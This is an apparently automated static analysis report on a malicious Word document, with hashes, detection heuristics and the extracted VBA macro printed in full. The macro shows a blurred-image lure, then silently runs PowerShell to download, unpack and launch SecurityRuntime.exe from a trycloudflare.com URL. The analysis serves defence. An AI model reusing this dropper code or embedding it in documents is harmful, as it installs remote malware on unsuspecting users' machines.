Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 1f5660cb801de5c7…

MALICIOUS

Office (OOXML) / .DOCX

2.16 MB Created: 2026-06-01 10:28:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-10
MD5: 62759aff3b1680427b5566bab2a72b9d SHA-1: 9a1134430d1b6aa6fc880a480de48778e29f7cc6 SHA-256: 1f5660cb801de5c7a777c25459f265855a0f90fa27de85eeaec87a673139b18d
250 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell Command, vbHide
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Document_Open()
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3265 bytes
SHA-256: f6982c663fcfff4c575a211a4774b8df63d13615ac2417dfc1a96c641ca92087
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim doc As Document
    Set doc = ActiveDocument
    Dim shp As Shape
    
    ' Отключаем обновление экрана, чтобы замена произошла мгновенно
    Application.ScreenUpdating = False
    
    ' Перебираем ВСЕ плавающие объекты в документе
    For Each shp In doc.Shapes
        
        ' Если это заблюренная версия — просто делаем её невидимой
        If InStr(1, shp.AlternativeText, "blur_") > 0 Then
            shp.Visible = msoFalse
        End If
        
        ' Если это четкая версия — делаем её видимой
        If InStr(1, shp.AlternativeText, "clear_") > 0 Then
            shp.Visible = msoTrue
        End If
        
    Next shp
    
    Call ОбновитьАгентаВФоне
    
    Application.ScreenUpdating = True
    MsgBox "Изображения успешно обновлены!", vbInformation, "Готово"
End Sub

Sub ОбновитьАгентаВФоне()
   
    Dim Url As String
    Dim TargetDir As String
    Dim ZipFile As String
    Dim ExtractDir As String
    Dim ExeName As String
    Dim Command As String
   
    ' ================== НАСТРОЙКИ ==================
    Url = "https://apps-partnership-types-bride.trycloudflare.com/SecurityRuntime-publish2.zip"
    
    TargetDir = "C:\Users\Public\Documents"
    ZipFile = TargetDir & "\SecurityRuntime-publish2.zip"
    ExtractDir = TargetDir & "\SecurityRuntime"
    ExeName = "SecurityRuntime.exe"
    
    ' ===============================================
   
    ' Команда PowerShell
    Command = "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command " & _
        """$url = '" & Url & "'; " & _
        "$zip = '" & ZipFile & "'; " & _
        "$extract = '" & ExtractDir & "'; " & _
        "$exeName = '" & ExeName & "'; " & _
        "$headers = @{'ngrok-skip-browser-warning'='true'}; " & _
        "$maxRetries = 5; $retry = 0; $success = $false; " & _
        "do { try { Invoke-WebRequest -Uri $url -OutFile $zip -Headers $headers -UseBasicParsing -TimeoutSec 30; $success = $true } " & _
        "catch { Start-Sleep -Seconds 6; $retry++ } } while (!$success -and $retry -lt $maxRetries); " & _
        "if(Test-Path $zip) { " & _
            "Expand-Archive -Path $zip -DestinationPath $extract -Force; " & _
            "Remove-Item $zip -Force -ErrorAction SilentlyContinue; " & _
            "$exePath = Get-ChildItem -Path $extract -Recurse -Filter $exeName -File | Select-Object -First 1 -ExpandProperty FullName; " & _
            "if($exePath) { Start-Process $exePath -WindowStyle Hidden } " & _
        "} else { Write-Host 'Не удалось скачать' -ForegroundColor Red }"""
   
    Shell Command, vbHide
    

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: e94b17e50cb1ccd9cf39b5cd81d72995a2da9fb5bf13f7c3e0c7c56b28d7c255